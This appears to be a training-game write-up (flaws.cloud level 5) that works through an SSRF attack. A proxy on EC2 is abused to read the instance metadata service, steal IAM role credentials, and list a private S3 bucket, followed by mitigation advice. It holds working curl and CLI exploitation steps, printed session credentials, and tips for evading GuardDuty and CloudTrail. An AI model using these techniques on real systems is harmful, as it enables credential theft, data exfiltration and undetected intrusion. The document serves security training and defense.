OK, this is not exactly what we will do. This game focuses on cloud security only and is kept simple. There won’t be complex applications protected by WAFs, just a simple proxy on an EC2 instance serving all the websites you request. From there, the goal is to find out how to make it serve the private IAM credentials that have been configured for this machine. Once you have them, all that is left is to use them to impersonate the EC2 instance and exfiltrate some data.
Still, it is very similar to what people believe happened in the CapitalOne hack. Check krebsonsecurity.com for what is known about it, or this indictment for the official version. The gist is that CapitalOne supposedly operated a well-known open-source WAF called ModSecurity and accidentally configured it to grant access to the so-called EC2 instance metadata service, which hands out IAM credentials to whoever has network access to it. These credentials allowed downloading the stolen data.
That is all. Let’s get going and see how all of this works.
Level 5
The level starts here. From the description we know that this link points to a proxy service operated on an EC2 instance. We can ask it to fetch any website for us by appending the URL to the “proxy” endpoint and terminating with a “/”.
Our goal is to get access to a bucket with a hidden directory. Most likely we have to find some credentials with permissions to access it.
Exploring the proxy
That was just the description. Let’s test the proxy to see if it works as promised. To do so, fetch the (HTTP) homepage of Google both directly and via the proxy. Here is the direct request (I show only a few headers):
# curl -i http://google.com
HTTP/1.1 301 Moved Permanently
Location: http://www.google.com/
Server: gws
...
We receive a 301 redirecting to the www version of the site. The server header is “gws”, short for Google Web Server, Google’s proprietary web server. Now request the site via the proxy:
# curl -i http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/google.com/
HTTP/1.1 301 Moved Permanently
Location: http://www.google.com/
Server: nginx/1.10.0 (Ubuntu)
...
This is mostly the same result, but the server is now nginx 1.10.0. This time the EC2 instance made the request to Google and forwarded the result to us.
Using icanhazip.com, a website that simply returns your IP address to you, we can confirm this further. Compare these two requests:
# curl icanhazip.com
132.83.234.10
#
# curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/icanhazip.com/
35.165.182.7
The direct request returns your public IP address, whereas the proxied request returns the public IP address of the proxy, which is 35.165.182.7.
You can verify this proxy IP address with “dig”:
# dig 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud @9.9.9.9
...
;; ANSWER SECTION:
4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud. 300 IN CNAME ec2-35-165-182-7.us-west-2.compute.amazonaws.com.
ec2-35-165-182-7.us-west-2.compute.amazonaws.com. 43200 IN A 35.165.182.7
Thus we now know for sure that we can use this EC2 instance to make requests on our behalf, and that we control the host name. To the site we request, it looks as if the EC2 instance itself made the request. What can we do with that?
Accessing Instance Metadata
EC2 instances on AWS have access to a so-called metadata service. The service is made available on a link-local IPv4 address (see RFC 3927) at 169.254.169.254. Accordingly it is only available from the EC2 instance itself and can never be requested directly from any other host.
Did the creator of the proxy block access to link-local IPv4 addresses? We should find out. Request http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/ and this is what you get:
# curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/
1.0
2007-01-19
...
2018-09-24
latest
This looks like the entry page for the metadata service. We have access!
The metadata service exposes plenty of configuration data about the instance. Start at 169.254.169.254/latest and follow the (non-clickable) links to explore. For example, at 169.254.169.254/latest/dynamic/instance-identity/document/ you will find a high-level summary of the configuration.
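Fetched through the proxy (same URL pattern as before), the request and its result look like this:
# curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/dynamic/instance-identity/document/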
{
"privateIp" : "172.31.41.84",
"devpayProductCodes" : null,
"marketplaceProductCodes" : null,
"version" : "2017-09-30",
"instanceId" : "i-05bef8a081f307783",
"billingProducts" : null,
"instanceType" : "t2.micro",
"availabilityZone" : "us-west-2a",
"kernelId" : null,
"ramdiskId" : null,
"accountId" : "975426262029",
"architecture" : "x86_64",
"imageId" : "ami-7c803d1c",
"pendingTime" : "2017-02-12T22:29:24Z",
"region" : "us-west-2"
}
Another place for valuable information is the user data. AWS lets you specify a script that runs when an instance boots up. You could see the script at 169.254.169.254/latest/user-data, but for this instance there is none. In other cases you may find hard-coded credentials in this script file.
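For completeness, the proxied request would look like this; it yields nothing of interest here since no user data is configured on this instance:
# curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/user-data/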
Most importantly though, you should check for IAM instance profile credentials. Instead of hard-coding passwords into EC2 instances, AWS allows you to assign an instance profile to a machine. The machine can then request temporary credentials with the corresponding permissions from the metadata service. These credentials are only valid for a short time (a few hours at most) and never touch any disk.
This means that we should be able to ask the proxy to get these credentials for us. The manual request is a two-step procedure. First, find the instance profile name at 169.254.169.254/latest/meta-data/iam/info/.
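Through the proxy, the request and its answer look like this:
# curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/info/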
{
"Code" : "Success",
"LastUpdated" : "2019-11-12T15:26:22Z",
"InstanceProfileArn" : "arn:aws:iam::975426262029:instance-profile/flaws",
"InstanceProfileId" : "AIPAIK7LV6U6UXJXQQR3Q"
}
Now we know it is called “flaws”. Second, fetch temporary credentials for this role from 169.254.169.254/latest/meta-data/iam/security-credentials/flaws.
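Again through the proxy; the output should look something like this:
# curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws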
{
"Code" : "Success",
"LastUpdated" : "2019-11-12T15:26:38Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIA6GG7PSQG2DUIX6WK",
"SecretAccessKey" : "nqHFBc6JioWLn97VcuR2M3JYDHoaMfsuc1oKyasH",
"Token" : "IQoJb3JpZ2luX2VjEPD//////////wEaCXVzLXdlc3QtMiJGMEQCIG1yD/Vn/GDjnsCiO/Z0fpBMb0683hKDRtchraQcILQEAiAejtgTNX34u9vtT3fOqgyrNK2bvVMJWC0BMg1RxT4Y8SrSAggZEAAaDDk3NTQyNjI2MjAyOSIMlCGMWOpWm2U+5ItZKq8Ct4hi0KsQvsXCfRZs6M5uSUcBsh6voTztyBRx/gz03VmntxcTVHQZ0A9OwVYqzwo5OPzrauGqWAvzoT4NfcYVhNL1aWezbfXASLlLntO2m3RUFzoJUxMTHA3MM0myFuSVpW4DQBh+uDHCBwaxODYp4lAIbLBWE5+AVFLo0VdCVMUI7Syp181BmJiOWG62VuP6Mo5GHYvnWej7X2i7xt8FK7glanlayMpxto0a5KQsQI0NlLXKthvplOE9vMXKluVhBDj6PEvWYfE2rrVqmordfmqWkJbzs/Xu3XO0QbH/O2wbisOp3Rh+hQ72vAGGyQNUyy/j4iDXvkSJf6XE0+MiCiDLIkzZO3QbhHogTLQruChDF4hFagZJpa3vzfuKe+a4867KwjPYy6TqSsQS6vz/MJ6eq+4FOs4CZqC9yNSdhvUV4feei8iDC4PLQc9kanGY/74wYTo6jhynACeOZaxTbK3lHPwOtR4EDTdHmvtZ85ayXJ0zmjVndR0lB/Mt7LAQx8yXNpT23u6bK4XdN928nxF6QvrOHzuteHrSGKLcZOsQZZ/G5kovD6o3eeJ++1lymBNPtzN3/FaeVMgPly7gMbbCRqW/Q65Zw7tTYbKVLQJAfAh19ukfnuCNDMJexaSaMWM5l+djbD+TNw9A3cm+GAb6j6yYAv21+EnBAuUxOISI5CCI+9wRfKGHu/vgSLVt1uwvkHnFBFMcvVfcTYg8kQIEGZTQnxOw/sDr/32PugpmXjBc3OdLajgucrKkUdhaHP/XIA8nEYy8yTQHZguw9tsXaox4wz/dQKMzJsT+6mGdmMGyOnKMZmlW9ZqqXgHC57fi01IhjcamrxZr9E216qNTvsYS2g==",
"Expiration" : "2019-11-12T21:42:31Z"
}
Nice, we have a key and a session token.
Using the credentials
So we have credentials now. Let’s try to list the bucket. To use the credentials, you can export them into your environment:
# export AWS_ACCESS_KEY_ID=ASIA6GG7PSQG2DUIX6WK
# export AWS_SECRET_ACCESS_KEY=nqHFBc6JioWLn97VcuR2M3JYDHoaMfsuc1oKyasH
# export AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEPD//////////wEaCXVzLXdlc3QtMiJGMEQCIG1yD/Vn/GDjnsCiO/Z0fpBMb0683hKDRtchraQcILQEAiAejtgTNX34u9vtT3fOqgyrNK2bvVMJWC0BMg1RxT4Y8SrSAggZEAAaDDk3NTQyNjI2MjAyOSIMlCGMWOpWm2U+5ItZKq8Ct4hi0KsQvsXCfRZs6M5uSUcBsh6voTztyBRx/gz03VmntxcTVHQZ0A9OwVYqzwo5OPzrauGqWAvzoT4NfcYVhNL1aWezbfXASLlLntO2m3RUFzoJUxMTHA3MM0myFuSVpW4DQBh+uDHCBwaxODYp4lAIbLBWE5+AVFLo0VdCVMUI7Syp181BmJiOWG62VuP6Mo5GHYvnWej7X2i7xt8FK7glanlayMpxto0a5KQsQI0NlLXKthvplOE9vMXKluVhBDj6PEvWYfE2rrVqmordfmqWkJbzs/Xu3XO0QbH/O2wbisOp3Rh+hQ72vAGGyQNUyy/j4iDXvkSJf6XE0+MiCiDLIkzZO3QbhHogTLQruChDF4hFagZJpa3vzfuKe+a4867KwjPYy6TqSsQS6vz/MJ6eq+4FOs4CZqC9yNSdhvUV4feei8iDC4PLQc9kanGY/74wYTo6jhynACeOZaxTbK3lHPwOtR4EDTdHmvtZ85ayXJ0zmjVndR0lB/Mt7LAQx8yXNpT23u6bK4XdN928nxF6QvrOHzuteHrSGKLcZOsQZZ/G5kovD6o3eeJ++1lymBNPtzN3/FaeVMgPly7gMbbCRqW/Q65Zw7tTYbKVLQJAfAh19ukfnuCNDMJexaSaMWM5l+djbD+TNw9A3cm+GAb6j6yYAv21+EnBAuUxOISI5CCI+9wRfKGHu/vgSLVt1uwvkHnFBFMcvVfcTYg8kQIEGZTQnxOw/sDr/32PugpmXjBc3OdLajgucrKkUdhaHP/XIA8nEYy8yTQHZguw9tsXaox4wz/dQKMzJsT+6mGdmMGyOnKMZmlW9ZqqXgHC57fi01IhjcamrxZr9E216qNTvsYS2g==
Confirm that it worked by checking your caller identity. It should be a role with the same name as the instance profile, with the instance ID as session name:
# aws sts get-caller-identity
{
"UserId": "AROAI3DXO3QJ4JAWIIQ5S:i-05bef8a081f307783",
"Account": "975426262029",
"Arn": "arn:aws:sts::975426262029:assumed-role/flaws/i-05bef8a081f307783"
}
Now the final part is easy. List the bucket:
# aws s3api list-objects-v2 --bucket level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud --region us-west-2
{
"Contents": [
...
{
"Key": "ddcc78ff/index.html",
"LastModified": "2017-03-03T04:36:25.000Z",
"ETag": "\"e144e5208ec070129e9e0bd9369967b0\"",
"Size": 2782,
"StorageClass": "STANDARD"
},
{
"Key": "index.html",
"LastModified": "2017-02-27T02:11:07.000Z",
"ETag": "\"6b0ffa72702b171487f97e8f443599ee\"",
"Size": 871,
"StorageClass": "STANDARD"
}
]
}
In the listing you can see that we found the secret subdirectory “ddcc78ff”. We can now browse to the hidden page at http://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/ and find ourselves in level 6.
The flaw
The main problem in this level is clearly that the proxy does not block requests to the metadata service. A proxy intended for websites should probably be set up such that it blocks at least link-local (RFC 3927) as well as private (RFC 1918) IP addresses, maybe with carefully chosen exceptions depending on the use case.
Still, you might argue that this is a rather special use case; not many people set up proxies like this one. From an application development point of view, though, any server-side request forgery (SSRF) vulnerability may be exploitable in the same way. So, besides carefully checking the configuration of your WAFs and other proxies, another lesson is how bad SSRF can be if you host your stuff on EC2. The HackerOne tutorial on SSRF specifically mentions EC2 metadata as a reason why SSRF can have a big impact.
Prevent misconfigurations and SSRF
Obviously, not making mistakes in the first place solves the problem, but it puts considerable responsibility on admins and developers: a single mistake is enough to create an opening. Still, fewer flaws means an attacker has a harder time finding one, so give your best. Write secure code and test your applications as well as all networking tools for SSRF. Critical components are all those that perform outbound requests on the user’s behalf and are somehow configurable; a webhooks feature is a typical place to look for SSRF.
Besides crossing your fingers, you can also firewall outgoing connections, as sketched below. This helps, but only if the legitimate applications running on the machine do not need the connection. In this level, for example, the instance may need access to the instance profile credentials (why else would it have an instance profile?), so you can’t just block access to the metadata service. In other cases it may help though.
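A minimal sketch of such a rule, run as root on the instance itself, could drop all outbound traffic to the metadata address:
# iptables -A OUTPUT -d 169.254.169.254 -j DROP
Or, if one service legitimately needs the credentials, permit only its service account and drop everything else (the user name “app” is a hypothetical example):
# iptables -A OUTPUT -d 169.254.169.254 -m owner --uid-owner app -j ACCEPT
# iptables -A OUTPUT -d 169.254.169.254 -j DROP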
IMDSv2
There is a brand-new version of the instance metadata service, announced only a few days ago, which is way more secure than the traditional one. Official documentation is here. By default both versions run in parallel, but it is possible to disable the old version explicitly.
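As the owner of the instance you could enforce the new version (i.e., disable version 1) with a single CLI call; sketched here with the instance ID we found in the identity document above:
# aws ec2 modify-instance-metadata-options --instance-id i-05bef8a081f307783 --http-tokens required --region us-west-2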
With this new version you have to set up a session with the metadata service before you can retrieve anything. You do so by requesting “http://169.254.169.254/latest/api/token” using the PUT method. It returns a token that needs to be sent in the “X-aws-ec2-metadata-token” header with all subsequent GET requests against the metadata service.
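Run on the instance itself, the handshake looks roughly like this (the TTL header is mandatory for the PUT; 21600 seconds is the maximum):
# TOKEN=$(curl -s -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" http://169.254.169.254/latest/api/token)
# curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/flaws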
In our case, this would have stopped the attack had version 1 been disabled. The proxy only makes GET requests for us, so there is no way to send the PUT for the login. Presumably there is also no way to brute-force the token it would have returned. As a result we would not be able to extract credentials.
For example, my (silly) attempt to make the proxy do a PUT can be seen below. Issuing a PUT against Google directly returns a complaint about an invalid method:
# curl -i -X PUT -d 'param=value' http://google.com
HTTP/1.1 405 Method Not Allowed
Allow: GET, HEAD
...
Trying to send this through the proxy returns just a 403:
# curl -i -X PUT -d 'param=value' http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/http://google.com
HTTP/1.1 403 Forbidden
...
Least privilege
When you are done with all of the above, assume that none of it helps and that your credentials will get disclosed anyway. It often requires some effort to design permissions tailored to the application using them. Still, it is the only way to limit the blast radius of a disclosure.
The CapitalOne hack is a great example of this. In an effort to present evidence for a hack, the indictment mentions that the WAF security account listed S3 buckets even though - under normal circumstances - it never does (page 7). This not only indicates unauthorized access, it is also a good example of credentials that have more permissions than they need: if the WAF never lists buckets, it should not be allowed to. In this case it was, maybe because it was just easier to grant access to all of S3 than to check what exactly is needed.
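As a sketch of what least privilege could look like for such a WAF: allow it to read objects from its own configuration bucket (the bucket name below is a made-up example) and nothing else. The bucket-listing call mentioned in the indictment would then simply be denied:
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::example-waf-config/*"
    }
  ]
}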
IAM IP constraints
Assume further that an attacker got credentials and that the permissions, whatever they are, allow doing harm. What else can we do to protect ourselves? One option is to add IP restrictions to your IAM policies. My personal experience is that AWS is not really designed for this and it can be clumsy to set up, but it does stop many attacks.
A lesser-known feature of IAM is that it allows you to specify conditions. A policy only takes effect if the conditions are met (AWS docs on condition keys). One such condition is that the public IP address of the entity making the API request has to be in a certain range. Consider the IAM policy below as an example. Attached to the IAM user “some-user”, it would deny all actions unless they originate from IP “1.2.3.4”:
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Deny",
      "Action": "*",
      "Resource": "*",
      "Condition": {
        "NotIpAddress": {
          "aws:SourceIp": [ "1.2.3.4/32" ]
        }
      }
    }
  ]
}
More details can be found in the knowledge base. Prepare for hard-to-debug problems if you do this at scale: AWS services sometimes call other services on your behalf, and the source IP of those requests will not be yours but that of the machine the AWS service runs on. Thus things may fail, apparently for no reason. For example, AWS Athena, a serverless version of Presto, accesses S3 on your behalf to execute queries on your S3 data. Requests to the Athena API originate from your IP, but the follow-up requests to the S3 API, while using your credentials, originate from the Presto cluster operated by AWS.
For the example in this level, you could add a condition that allows using the credentials only from the public IP address of the EC2 instance (you may want to attach an Elastic IP to ensure it does not change on a reboot). Such a restriction would make it much harder for us to use the credentials from elsewhere, particularly if we do not know about the restriction. Note that if we do know, we may attempt to route our AWS API access through the proxy on the EC2 machine. It probably works, but looks like quite some work to me (if you successfully did it, let me know!). With a mere SSRF vulnerability it may often be impossible altogether.
Detection and alerting
Finally, if we can’t prevent it, we should at least know about unauthorized use of credentials. Early detection allows us to deactivate access credentials before serious harm is done. We need alerts and AWS has much to offer in regards to that. Imho the most important services are GuardDuty and CloudTrail.
GuardDuty
First and foremost, there is an AWS service called GuardDuty which watches your account for suspicious behavior. One of its features is to detect EC2 instance credential use from any host that does not have a known EC2 address. While it would not stop the attack, you would at least receive a warning about suspicious behaviour (e.g., via email): an UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration finding that includes the IP of the attacker.
However, as an attacker it is quite easy to evade this GuardDuty rule: you can use stolen credentials from literally any EC2 machine on earth. Just don’t use your laptop; fire up an attack machine on EC2 instead. That is all it takes. A detailed example of this evasion technique can be found on Nick Frichette’s blog.
As a side note: don’t use Kali, Parrot or Pentoo for your requests either, not even if you run them on EC2. The reason is that tools like the AWS CLI and SDKs expose operating system details to AWS in the user agent of each request, and GuardDuty has rules that alert when typical hacker operating systems show up. It is easy to change the user agent to something normal, so if you do use these distributions, remember to patch your tools.
CloudTrail
Second, there is a service called CloudTrail which is capable of logging all requests made to the AWS API that somehow relate to your account (actually, much of GuardDuty is built on this service). Clever defenders can use it to inspect how credentials are typically used and build alerts for unusual behaviour. For example, above we verified our identity by calling get-caller-identity, an endpoint of the Security Token Service API. If the EC2 instance normally never does this, seeing such a call would be a good indicator of compromise. Filter for “eventName” = “GetCallerIdentity” in CloudTrail to see it.
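With the account owner’s credentials, recent occurrences of that call can be pulled from the CloudTrail event history, for example like this:
# aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=GetCallerIdentity --region us-west-2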
As an attacker, the only way to avoid detection then is to either use (guess) only legitimate calls, or to call APIs that do not support CloudTrail yet (a nice trick described on rhinosecuritylabs.com). Amazon maintains a list of brand-new services without CloudTrail support here. For example, at the time of writing Amazon Connect is not supported. To learn our IAM identity without “get-caller-identity”, we can issue a request against this API and - assuming it is unauthorized - the error message contains our identity:
# aws connect describe-user --user-id abc --instance-id 123
An error occurred (AccessDeniedException) when calling the DescribeUser operation: User: arn:aws:sts::975426262029:assumed-role/flaws/i-05bef8a081f307783 is not authorized ...
No entry that could be alerted on would appear in CloudTrail. Knowing the name of a role, you may be able to guess what it is good for and make follow-up calls.
Conclusion
We saw how the exploitation of proxy or web application vulnerabilities can lead to the disclosure of AWS credentials and how attackers can then leverage these credentials to exfiltrate data. The example of CapitalOne shows that issues like this are a real problem. The workflow is pretty straightforward and, unless sophisticated logging is in place, attackers can pretty much just poke at the AWS API until they find something they have access to. The fact that public clouds have public APIs plays into the attacker’s hands here.
Multiple things can be done to mitigate the risk:
- Write secure application code and proper configuration so that credentials don’t leak (i.e., do a lot of testing)
- Harden the EC2 instance metadata service to make it hard to exploit a flaw (i.e., disable IMDSv1)
- Follow the principle of least privilege and add IP or VPC constraints when you design IAM policies
- Use AWS logging and alerting services like GuardDuty and CloudTrail to detect misuse early so that you have time to react